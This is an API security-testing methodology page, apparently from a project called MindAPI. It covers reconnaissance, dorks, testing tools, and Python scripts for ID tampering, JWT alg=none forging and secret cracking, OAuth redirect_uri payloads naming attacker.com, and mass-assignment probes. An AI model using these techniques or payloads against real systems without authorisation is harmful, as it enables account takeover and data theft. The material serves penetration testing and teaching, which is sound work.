MindAPI

Reconnaissance

Identify architecture

Architecture

  • REST APIs
    • RESTful
      • URL structure
        • Often use resource-oriented URLs such as: /api/v1/product/1234
      • Response structure
        • Often in JSON or XML format
        • Consistent and hierarchical structure
    • OData
      • A metadata document is usually provided at /odata/$metadata
      • Specific query options present on the URL, e.g. /odata/Products?$filter=Price gt 10&$orderby=Price desc
      • Response often includes annotations @odata.context or @odata.metadata
      • Typically format is JSON
      • Usually the response Content-Type includes the string odata: application/json;odata.metadata=full
  • GraphQL
    • Response structure
      • If there is an issue with the query, an errors array is included in the response
      • Error messages such as Cannot query field or Field <field_name> not found are usually indicative of a GraphQL API
      • If the query succeeds, the response contains a data object holding the actual query results (errors and data can both be present in one response)
    • Specific fields
      • Response may include __typename which is used to identify the type of an object
  • SOAP
    • Transferred data in XML format, wrapped in an Envelope/Body element of the SOAP namespace; the service is usually described by a WSDL
  • XML-RPC
    • Transferred data in a simpler XML format, wrapped in methodCall/methodResponse elements, e.g. <methodCall><methodName>getUser</methodName><params><param><value><string>David</string></value></param></params></methodCall>
  • JSON-RPC
    • Transferred data similar to XML-RPC but in JSON format, with a jsonrpc/method/params/id envelope, e.g. {"jsonrpc":"2.0","method":"getUser","params":{"firstName":"David"},"id":1}
  • gRPC-Protobuf
    • Identify gRPC
      • Content-Type request header: application/grpc, application/grpc+proto or, for gRPC-Web, application/grpc-web(+proto)
      • Accept request header carrying the same media types
      • Access-Control-Expose-Headers response header listing grpc-status and grpc-message (gRPC-Web)
    • gRPC messages are encoded using Protobuf, which is binary
  • Webhooks
    • Event-driven callbacks: the API sends an HTTP request to a URL the consumer registered whenever a trigger fires (e.g. a scheduled time, clicking a button, receiving a form submission)
      • Identify
        • Search for webhooks or event subscriptions on the documentation
        • Find a reference on how to register a callback URL
        • Is there a list of events types that can trigger a webhook?
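The signals above can be turned into a small classifier. The script below is an added example written for this page, not part of MindAPI itself: it checks one response (headers plus body) for the OData annotations and Content-Type, the GraphQL errors/data envelope and __typename, the gRPC media types and exposed headers, the JSON-RPC envelope, the SOAP Envelope and the XML-RPC methodCall/methodResponse elements, most specific first. The sample responses embedded in it are constructed, not captured from any real target.

```python
import json
import re

# Constructed sample responses (not captures from any real target), one per architecture.
SAMPLES = {
    "grpc": ({"Content-Type": "application/grpc+proto",
              "Access-Control-Expose-Headers": "grpc-status,grpc-message"},
             b"\x00\x00\x00\x00\x02\x08\x01"),
    "odata": ({"Content-Type": "application/json;odata.metadata=full"},
              '{"@odata.context":"https://api.example/odata/$metadata#Products","value":[]}'),
    "graphql": ({"Content-Type": "application/json"},
                '{"errors":[{"message":"Cannot query field \\"foo\\" on type \\"Query\\"."}],"data":null}'),
    "json-rpc": ({"Content-Type": "application/json"},
                 '{"jsonrpc":"2.0","result":{"users":[{"firstName":"David"}]},"id":1}'),
    "soap": ({"Content-Type": "text/xml"},
             '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
             '<soap:Body><getUserResponse><firstName>David</firstName></getUserResponse></soap:Body></soap:Envelope>'),
    "xml-rpc": ({"Content-Type": "text/xml"},
                '<?xml version="1.0"?><methodResponse><params><param><value><string>David</string>'
                '</value></param></params></methodResponse>'),
    "rest-json": ({"Content-Type": "application/json"}, '{"id":1234,"name":"Widget"}'),
}

GRAPHQL_ERROR_RE = re.compile(r'Cannot query field|Field "?\w+"? not found|Syntax Error', re.I)


def _header(headers, name):
    """Case-insensitive header lookup; returns "" when the header is absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def _looks_like_graphql(doc):
    errors = doc.get("errors")
    if isinstance(errors, list):
        messages = " ".join(str(e.get("message", "")) for e in errors if isinstance(e, dict))
        if GRAPHQL_ERROR_RE.search(messages) or "data" in doc:
            return True  # {"errors": [...], "data": ...} is the GraphQL response envelope
    data = doc.get("data")
    return isinstance(data, dict) and "__typename" in json.dumps(data)


def fingerprint(headers, body):
    """Classify one response as grpc, odata, graphql, json-rpc, soap, xml-rpc, rest-json,
    rest-xml or unknown. The most specific signals are checked first so that an OData or
    JSON-RPC body (which is also valid JSON) is not reported as plain REST."""
    ctype = _header(headers, "Content-Type").lower()
    exposed = _header(headers, "Access-Control-Expose-Headers").lower()

    # gRPC / gRPC-Web bodies are binary Protobuf, so decide on headers before touching them.
    if ctype.startswith("application/grpc") or "grpc-status" in exposed:
        return "grpc"

    if isinstance(body, bytes):
        try:
            body = body.decode("utf-8")
        except UnicodeDecodeError:
            return "unknown"
    text = body.strip()

    if text[:1] in ("{", "["):
        try:
            doc = json.loads(text)
        except json.JSONDecodeError:
            return "unknown"
        if not isinstance(doc, dict):
            return "rest-json"
        if "odata" in ctype or any(k.startswith("@odata.") for k in doc):
            return "odata"
        if doc.get("jsonrpc") == "2.0":
            return "json-rpc"
        if _looks_like_graphql(doc):
            return "graphql"
        return "rest-json"

    if text.startswith("<"):
        if re.search(r"<(\w+:)?Envelope\b[^>]*soap", text, re.I):
            return "soap"
        if re.search(r"<method(Call|Response)\b", text):
            return "xml-rpc"
        return "rest-xml"

    return "unknown"


def fingerprint_samples():
    """Run the classifier over the constructed samples; returns {expected: detected}."""
    return {name: fingerprint(hdrs, body) for name, (hdrs, body) in SAMPLES.items()}


if __name__ == "__main__":
    for expected, detected in fingerprint_samples().items():
        print(f"{expected:10s} -> {detected}")
```

Feed it the headers and body of any response you capture during traffic analysis; the order of checks is the point, since a generic "is it JSON?" test alone would label OData, JSON-RPC and GraphQL as REST.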

Documentation

Check for documentation

Automatic

Swagger
OData
  • /$metadata
WADL
  • /application.wadl
  • /application.wadl?detail=true
  • /api/application.wadl
WSDL
GraphQL

Manual

  • site:target.tld intitle:api | developer

Search for APIs

Traffic Analysis

Android apps

Wayback Machine

Path Manipulation

  • /api/v1/
  • /api/v2/
  • /api/v3/
  • /api/
  • /api/private
  • /api/partner
  • /api/test
  • api.target.com/v1
  • api.target.com/v2
  • api.target.com/v3

Key/Token identification/Testing

Dorks

Google
  • site:target.tld inurl:api
  • intitle:"index of" "api.yaml" site:target.tld
  • REST
    • site:target.tld inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
  • GraphQL
    • site:target.tld inurl:graphql
  • WADL
    • inurl:/application.wadl
    • user filetype:wadl
    • ext:wadl
  • WSDL
    • user filetype:wsdl
    • ext:wsdl
  • Odata
    • inurl:/%24metadata
  • Webhooks
    • inurl:docs webhook
Github

Secrets

API Directories

Enumerate endpoints / methods

Endpoints

GraphQL
Swagger
Other
WADL

Tools

ffuf
Amass
nuclei
Jaeles
Arjun
ParamSpider
param-miner
TnT-Fuzzer
Kiterunner
graphw00f
clairvoyance
json2paths
feroxbuster
wfuzz
ReconAIzer
JS Miner
GoBuster
katana
Sasori

Supported Content Types

  • Play with request URL
    • Requested resource extension e.g. replacing .json by .xml
    • Query string e.g. replacing ?json by ?xml or ?format=json by ?format=xml
  • Play with Content-Type request header and payload
    • Without Content-Type, submit either json, xml, ...
    • Changing Content-Type and payload accordingly

Testing

Broken Object Level Authorization

Endpoint receives an ID?

Understand the pattern
  • Sequential
  • Encoded
  • UUID (aka GUID)
  • Composite IDs
  • Hashed
  • Randomly Generated Strings
  • Temporal
Tamper
Change
  • Next/Previous value
  • Compute/Predict (e.g. UUIDv1 embeds a timestamp and the generating node, so neighbouring values are derivable from one observed ID)
  • Data Type
    • Is it a number? Change it to a string
    • Is it a string? Change it to a number
  • Method
    • GET to POST
    • GET to PUT
    • GET to PATCH
  • Base64 encoded?
    • Decode it, modify it, encode it again
Duplicate
  • ?id=1&id=2
Add as an array
  • ?id[]=1&id[]=2
Wildcard
  • GET /users/id -> GET /users/*
Cross-deployments IDs
  • Identify other deployments (hosts) of your target API
  • Enumerate resource IDs (often non-numerical/non-sequential ones)
  • Test those IDs on your target API host
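The pattern analysis and tampering steps above can be scripted. The following is an added example for this page, not MindAPI tooling: it guesses the ID scheme from its shape, derives the next/previous value for sequential IDs, decodes/modifies/re-encodes base64 IDs, recomputes a neighbouring UUIDv1 from the observed one (same node and clock sequence, timestamp plus or minus one tick), and produces the duplicate, array, wildcard and method variants for a query-string parameter. All sample IDs and the /api/v1/orders path are constructed.

```python
import base64
import binascii
import re
import uuid

UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[1-8][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$", re.I)
HEX_RE = re.compile(r"^[0-9a-f]+$", re.I)


def _b64decode(raw):
    """Decoded text if raw is printable base64/base64url, otherwise None."""
    try:
        text = base64.urlsafe_b64decode(raw + "=" * (-len(raw) % 4)).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def _b64encode(text, padded):
    enc = base64.urlsafe_b64encode(text.encode()).decode()
    return enc if padded else enc.rstrip("=")


def _bump(text, delta):
    """Add delta to the trailing run of digits, keeping its width ('user:1234' -> 'user:1235')."""
    m = re.search(r"(\d+)$", text)
    if not m:
        return None
    return text[: m.start()] + str(int(m.group(1)) + delta).zfill(len(m.group(1)))


def classify_id(raw):
    """Guess the ID scheme from its shape: sequential, uuid, hashed, encoded or opaque."""
    if raw.isdigit():
        return "sequential"
    if UUID_RE.match(raw):
        return "uuid"
    if HEX_RE.match(raw) and len(raw) in (32, 40, 64):
        return "hashed"  # md5 / sha1 / sha256 sized hex digest
    if _b64decode(raw) is not None:
        return "encoded"
    return "opaque"


def _uuid1_with_time(u, t):
    """Rebuild a v1 UUID with a different 60-bit timestamp, same clock sequence and node."""
    fields = (t & 0xFFFFFFFF, (t >> 32) & 0xFFFF, ((t >> 48) & 0x0FFF) | 0x1000,
              u.clock_seq_hi_variant, u.clock_seq_low, u.node)
    return str(uuid.UUID(fields=fields))


def id_variants(raw):
    """Tampered values to try in place of raw, keyed by what each one tests."""
    kind = classify_id(raw)
    v = {"original": raw, "kind": kind}
    if kind == "sequential":
        v["next"] = _bump(raw, 1)
        v["previous"] = _bump(raw, -1)
        v["as_number"] = int(raw)  # type change: JSON number where a string was sent
        v["as_string"] = raw       # and the string form where a number was expected
    elif kind == "uuid":
        u = uuid.UUID(raw)
        if u.version == 1:
            # v1 = timestamp + clock sequence + node (MAC): IDs issued on the same host a
            # tick earlier or later are predictable from one observed value
            v["uuid1_next_tick"] = _uuid1_with_time(u, u.time + 1)
            v["uuid1_prev_tick"] = _uuid1_with_time(u, u.time - 1)
        v["as_number"] = 1  # type change probe; the value itself is irrelevant
    elif kind == "encoded":
        decoded = _b64decode(raw)
        v["decoded"] = decoded
        bumped = _bump(decoded, 1)
        if bumped is not None:
            v["reencoded_modified"] = _b64encode(bumped, raw.endswith("="))
    else:
        v["as_number"] = 1
    return v


def request_variants(path, param, mine, other):
    """Parameter-shape and method variants for a query-string ID (mine = an ID you own,
    other = the ID you should not be able to reach)."""
    urls = [
        f"{path}?{param}={other}",                     # plain substitution
        f"{path}?{param}={mine}&{param}={other}",      # duplicated parameter
        f"{path}?{param}[]={mine}&{param}[]={other}",  # array form
        f"{path}?{param}=*",                           # wildcard
    ]
    return [(method, url) for method in ("GET", "POST", "PUT", "PATCH") for url in urls]


if __name__ == "__main__":
    for sample in ("1234", "dXNlcjoxMjM0", "6ba7b810-9dad-11d1-80b4-00c04fd430c8"):
        print(id_variants(sample))
    for method, url in request_variants("/api/v1/orders", "id", "1234", "1235"):
        print(method, url)
```

Send each variant with your own session and compare status code, body length and the returned owner field against the response for an ID you legitimately own; an identical shape for someone else's ID is the finding.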

Check the response

Tools

Broken Authentication

Test

URL sensitive data
  • Passwords
  • Tokens
Brute force attacks
  • Login
  • Forgot Password
  • Forgot Username
Authenticity of tokens
Password
Strength
  • Changing Password
  • Registration
Type
  • Plain text
  • Weak encryption
  • Weak hash algorithm
API Keys
  • Predictable
  • Weak hash algorithm

Types of Authentication

JWT
Multiple JWT test cases
  • jwt_tool
    • python3 jwt_tool.py -t https://api.example.com/api/working_endpoint -rh "Content-Type: application/json" -rh "Authorization: Bearer [JWT]" -M at
    • https://github.com/ticarpi/jwt_tool
Test JWT secret brute-forcing
Abusing JWT Public Keys Without knowing the Public Key
Test if algorithm could be changed
Test if signature is being validated
Test token expiration time (TTL, RTTL)
Test if sensitive data is in the JWT
Check for Injection in "kid" element
Check that HMAC signatures are verified with a constant-time comparison
Check that keys and secrets are different between ENV
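Several of the JWT checks above (alg=none, signature not validated, secret brute-forcing, expiry, constant-time HMAC comparison, sensitive data in claims) can be exercised offline with the standard library. The script below is an added example for this page, not part of jwt_tool or MindAPI: it puts a verifier that trusts the header's alg and compares signatures with == next to one that pins the algorithm, uses hmac.compare_digest and enforces exp, forges an alg=none token against both, runs a small dictionary attack on the HS256 secret, and audits the claims of an unverified decode. The secret, the claims and the wordlist are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = "s3cret"  # constructed signing secret for the demo issuer (assumption)


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _segment(obj) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload, secret, header=None):
    header = header or {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{_segment(header)}.{_segment(payload)}"
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def decode_unverified(token):
    """Header and payload without checking the signature: for inspection only."""
    h, p, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def verify_vulnerable(token, secret):
    """Trusts the header: alg=none is accepted and the signature is compared with ==."""
    h, p, s = token.split(".")
    header, payload = decode_unverified(token)
    if str(header.get("alg", "")).lower() == "none":
        return payload  # no signature required at all
    expected = b64url(hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest())
    if s == expected:  # not constant-time
        return payload
    raise ValueError("bad signature")


def verify_hardened(token, secret, now=None):
    """Pins alg to HS256, compares the MAC in constant time and enforces exp."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":  # allow-list; never let the token choose
        raise ValueError("unexpected alg")
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_decode(s), expected):
        raise ValueError("bad signature")
    payload = json.loads(b64url_decode(p))
    now = time.time() if now is None else now
    if not isinstance(payload.get("exp"), (int, float)) or payload["exp"] <= now:
        raise ValueError("missing or expired exp")
    return payload


def forge_none(token, extra_claims):
    """Rebuild the token with alg=none, modified claims and an empty signature."""
    _header, payload = decode_unverified(token)
    payload = {**payload, **extra_claims}
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(payload)}."


def crack_hs256(token, wordlist):
    """Offline dictionary attack on the HS256 secret; returns the secret or None."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


SENSITIVE_CLAIMS = {"password", "pwd", "secret", "ssn", "credit_card", "api_key"}


def audit_claims(payload, now):
    """Findings from an unverified decode: sensitive claims, missing exp, and the TTL."""
    findings = [f"sensitive claim: {k}" for k in payload if k.lower() in SENSITIVE_CLAIMS]
    if "exp" not in payload:
        findings.append("no exp claim")
    else:
        findings.append(f"ttl={int(payload['exp'] - payload.get('iat', now))}s")
    return findings


# Constructed token: issued at 1_900_000_000, valid for one hour.
TOKEN = sign_hs256({"sub": "1234", "role": "user", "iat": 1_900_000_000, "exp": 1_900_003_600}, SECRET)

if __name__ == "__main__":
    forged = forge_none(TOKEN, {"role": "admin"})
    print("vulnerable accepts alg=none:", verify_vulnerable(forged, SECRET)["role"])
    print("cracked secret:", crack_hs256(TOKEN, ["password", "secret", "s3cret"]))
    print(audit_claims(decode_unverified(TOKEN)[1], 1_900_000_100))
```

Against a live target, forge_none and the "alg" variations (none, None, NONE) are the requests to send to the working endpoint from the jwt_tool line above; crack_hs256 is what a weak-secret finding looks like before you switch to a real wordlist.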
OAuth
  • Test redirect_uri
    • Open redirects
      • Common issues
        • ?redirect_uri=https://attacker.com
        • ?redirect_uri=https://ATTACKER.TARGET.TLD
        • ?redirect_uri=https://ALLOWED_HOST.com/callback?redirectUrl=https://attacker.com
        • ?redirect_uri=https://TARGET.TLD.attacker.com
        • ?redirect_uri=https://TARGET.TLD%252eattacker.com
        • ?redirect_uri=https://TARGET.TLD//attacker.com/
      • Fuzz
    • XSS
  • Test the existence of response_type=token
  • Testing state
    • Missing state parameter?
      • CSRF
        • Start the flow yourself, obtain a valid authorization code and do not redeem it
          • Embed the callback URL carrying that code in a crafted CSRF page and send it to the victim on TARGET (their session is then bound to your code)
    • Predictable state parameter?
    • Is state parameter being verified?
  • If access is revoked, are outstanding authorization codes (and tokens issued from them) also revoked?
  • Credential leakage
    • Check the Referer header
    • Check the browser history
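The redirect_uri payloads listed above fail or succeed depending on how the authorization server validates the parameter. The script below is an added example for this page, not MindAPI code: it runs those payloads (with a constructed registered URI of https://app.target.tld/callback, plus a userinfo variant) through three weak validators seen in practice (prefix match, substring match, host-suffix match) and through the exact-string match that RFC 6749 and the OAuth 2.0 Security BCP call for, and reports which validator accepts which payload.

```python
from urllib.parse import urlsplit

# Constructed: the redirect_uri registered for the client at the authorization server.
REGISTERED = "https://app.target.tld/callback"
REGISTERED_HOST = "app.target.tld"

# The page's payload list with app.target.tld substituted, plus a userinfo variant.
PAYLOADS = [
    "https://app.target.tld/callback",                                   # the registered value
    "https://attacker.com/callback",
    "https://attacker.target.tld/callback",                              # sibling subdomain
    "https://app.target.tld/callback?redirectUrl=https://attacker.com",  # chained open redirect
    "https://app.target.tld.attacker.com/callback",                      # registered host as prefix
    "https://app.target.tld%252eattacker.com/callback",                  # double-encoded dot
    "https://app.target.tld//attacker.com/",                             # path confusion
    "https://app.target.tld@attacker.com/callback",                      # userinfo before the real host
]


def weak_prefix(uri):
    """Accepts anything that starts with the registered origin."""
    return uri.startswith("https://" + REGISTERED_HOST)


def weak_contains(uri):
    """Accepts anything mentioning the registered domain anywhere in the string."""
    return "target.tld" in uri


def weak_host_suffix(uri):
    """Accepts the registered domain and every subdomain of it."""
    host = (urlsplit(uri).hostname or "").lower()
    return host == "target.tld" or host.endswith(".target.tld")


def strict_exact(uri):
    """Exact string match against the registered value(s); no normalisation, no prefixes."""
    return uri in {REGISTERED}


VALIDATORS = [weak_prefix, weak_contains, weak_host_suffix, strict_exact]


def accepted_by(validator, payloads=PAYLOADS):
    """Payloads the given validator lets through."""
    return [p for p in payloads if validator(p)]


def matrix(payloads=PAYLOADS):
    """{payload: {validator_name: accepted}} for every payload and validator."""
    return {p: {v.__name__: v(p) for v in VALIDATORS} for p in payloads}


if __name__ == "__main__":
    for uri, verdicts in matrix().items():
        bad = [name for name, ok in verdicts.items() if ok and uri != REGISTERED]
        print(f"{uri}\n    accepted by: {', '.join(bad) or 'none'}")
```

The host-suffix validator is the one that looks safe and is not: any subdomain of target.tld that an attacker can control (a dangling CNAME, user-controlled subdomains) becomes a valid redirect target, and the userinfo and prefix payloads show why parsing the URL is not a substitute for comparing it verbatim.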
Basic Auth

Excessive Data Exposure

Check if the API returns full data objects from database with sensitive data

Compare client data with the API response to check if the filtering is done by client side

Sniff the traffic to check for sensitive data returned by the API

Lack of Resources & Rate Limiting

Execution timeouts

Test brute-force attacks

Max allocable memory

Number of file descriptors

Number of processes

Request payload size (e.g. uploads)

Number of requests per client/resource

Number of records per page to return in a single request response

Broken Function Level Authorization

  • Can a regular user access administrative endpoints? (MindAPI recon can help you here)
  • Does switching the HTTP method (GET, POST, PUT, DELETE, PATCH) on the same endpoint allow privilege escalation?
  • Enumerate/brute-force endpoints to find ones that answer requests without proper authorization (MindAPI recon can help you here)

Mass Assignment

Enumerate object properties

  • API documentation (Reconnaissance)
  • Inspect available API clients' network traffic
    • Desktop
    • Mobile
    • Web
  • Exercise data retrieval endpoints
    • watch-out for ?include=user.addresses,user.cards-like parameters
  • Uncover hidden properties
    • Guessing, based on API context
    • Reverse engineering available API clients
    • Fuzzing

Craft request payloads

  • Include augmented objects
    • One additional property at a time
    • Possible combinations of properties
    • All enumerated properties at once
  • Vary properties data types/values
    • Number, String, Array, Object
    • State values: to-do -> in-progress -> done (keep in mind possible state transitions)
  • Test different operation types
    • Create
    • Update
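The enumeration and payload-crafting steps above reduce to generating the augmented objects and checking which hidden properties the server persisted. The following is an added example written for this page, not MindAPI tooling: it builds the one-at-a-time, combination and all-at-once payloads, the per-property type variants, and a check that reads the response object back and reports every hidden property echoed with the value that was sent. The profile payload, the hidden properties and the two stand-in server functions (one binding every field, one using an allow-list) are constructed.

```python
from itertools import combinations

# Constructed context: the documented "update profile" body, plus properties uncovered
# during enumeration (documentation, client traffic, ?include= responses, guessing).
BASE_PAYLOAD = {"displayName": "David", "email": "david@example.com"}
HIDDEN_PROPERTIES = {"role": "admin", "isVerified": True, "creditBalance": 100000}


def augmented_payloads(base, hidden):
    """Yield (label, payload): one extra property at a time, then every combination;
    the final combination is 'all enumerated properties at once'."""
    keys = list(hidden)
    for size in range(1, len(keys) + 1):
        for combo in combinations(keys, size):
            payload = dict(base)
            payload.update({k: hidden[k] for k in combo})
            yield "+".join(combo), payload


def type_variants(payload, key):
    """Same property, different JSON types, to probe loose deserialisation."""
    value = payload[key]
    alternatives = {
        "number": 1,
        "string": str(value),
        "array": [value],
        "object": {"value": value},
    }
    for label, alt in alternatives.items():
        variant = dict(payload)
        variant[key] = alt
        yield f"{key}:{label}", variant


def accepted_properties(sent, response, hidden):
    """Hidden properties the server echoed back with exactly the value we sent:
    that echo is the mass-assignment finding."""
    return sorted(k for k in hidden if k in sent and response.get(k) == sent[k])


def _stored_record():
    return {"id": 42, "displayName": "", "email": "", "role": "user",
            "isVerified": False, "creditBalance": 0}


def _vulnerable_server(body):
    """Stand-in for a handler that binds every request field onto the model."""
    stored = _stored_record()
    stored.update(body)
    return stored


def _hardened_server(body):
    """Stand-in for a handler that binds only an explicit allow-list of fields."""
    allowed = {"displayName", "email"}
    stored = _stored_record()
    stored.update({k: v for k, v in body.items() if k in allowed})
    return stored


def run_probe(server, base=BASE_PAYLOAD, hidden=HIDDEN_PROPERTIES):
    """Send every augmented payload to `server` and collect the accepted hidden properties."""
    findings = {}
    for label, payload in augmented_payloads(base, hidden):
        accepted = accepted_properties(payload, server(payload), hidden)
        if accepted:
            findings[label] = accepted
    return findings


if __name__ == "__main__":
    print("vulnerable:", run_probe(_vulnerable_server))
    print("hardened:", run_probe(_hardened_server))
```

Replace the stand-in server functions with a function that sends the payload to the create and update endpoints and returns the parsed response object; when the API does not echo the object, follow each write with the matching read endpoint before calling accepted_properties.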

Security Misconfiguration

The latest security patches are missing, or the systems are out of date.

Can you use other HTTP verbs?

Test if Transport Layer Security (TLS) is missing

Test for security headers

CORS is well configured?

  • Astra
  • API Fuzzer
  • Test origin handling: send an Origin request header naming a different or seemingly untrusted site and check whether it is reflected in Access-Control-Allow-Origin, and whether Access-Control-Allow-Credentials: true is set alongside it

Force an error to see if any sensitive information is exposed

GraphQL

Injection

Test if user input is validated, filtered, or sanitized by the API

Test if client data is used in, or concatenated into, DB queries, OS commands, etc.

Check if incoming data from external systems is validated, filtered, or sanitized by the API

Improper Assets Management

  • Check for the API documentation (MindAPI recon can help you here)
  • Hosts inventory is missing or outdated.
  • Integrated services inventory, either first- or third-party, is missing or outdated.
  • Old or previous API versions are running unpatched.
  • The aspects of the API (e.g. name, purpose, owner, description, authentication, endpoints, versioning, redirects, errors, parameters, rate-limiting, request and response formats, etc) are missing or outdated.
  • If the API documentation is exposed to the internet, implement an access control mechanism (e.g. login portal) to ensure that only authorized users access the OpenAPI specification or even to the documentation as a whole.
  • If your API shares data with a third-party or you are consuming a third-party API, make sure to include it in the inventory.

API Testing tools